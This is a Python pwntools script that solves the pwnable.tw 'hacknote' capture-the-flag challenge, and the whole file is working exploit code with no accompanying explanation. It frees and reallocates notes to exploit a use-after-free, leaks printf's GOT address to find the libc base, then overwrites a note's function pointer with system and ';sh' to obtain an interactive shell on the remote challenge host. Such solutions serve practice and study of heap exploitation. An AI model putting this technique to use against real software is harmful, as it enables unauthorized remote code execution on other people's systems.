pwnable.tw hacknote

attack_hacknote.py

from pwn import *

#p = process('./hacknote', env={"LD_PRELOAD" : "./libc_32.so.6"})
p = remote('chall.pwnable.tw', 10102)

libc = ELF('./libc_32.so.6')
binsh_addr = 0
for address in libc.search('/bin/sh\x00'):
    print("/bin/sh address is " + str(hex(address)))
    binsh_addr = address

printf_addr = libc.functions['printf'].address

p.recvuntil('choice :')
p.sendline('1')
p.recvuntil('Note size :')
p.sendline('16')
p.recvuntil('Content :')
p.sendline('a'*15)

p.recvuntil('choice :')
p.sendline('1')
p.recvuntil('Note size :')
p.sendline('16')
p.recvuntil('Content :')
p.sendline('a'*15)

p.recvuntil('choice :')
p.sendline('2')
p.recvuntil('Index :')
p.sendline('0')

p.recvuntil('choice :')
p.sendline('2')
p.recvuntil('Index :')
p.sendline('1')

p.recvuntil('choice :')
p.sendline('1')
p.recvuntil('Note size :')
p.sendline('8')
p.recvuntil('Content :')
#0x804862b
#got_print 0x804a010
p.sendline(p32(0x804862b)+p32(0x804a010))

p.recvuntil('choice :')
p.sendline('3')
p.recvuntil('Index :')
p.sendline('0')
got_printf = u32(p.recvline()[0:4])
print("print address is " + str(hex(got_printf)))

libc_base = got_printf - printf_addr
binsh_addr2 = binsh_addr + libc_base
system_addr = libc.functions['system'].address
system_addr2 = system_addr + libc_base

p.recvuntil('choice :')
p.sendline('2')
p.recvuntil('Index :')
p.sendline('2')

p.recvuntil('choice :')
p.sendline('1')
p.recvuntil('Note size :')
p.sendline('8')
p.recvuntil('Content :')
p.send(p32(system_addr2)+";sh\00")

#p.recvuntil('choice :')
p.sendline('3')
#p.recvuntil('Index :')
p.sendline('0')

#print(p.recv())
p.interactive()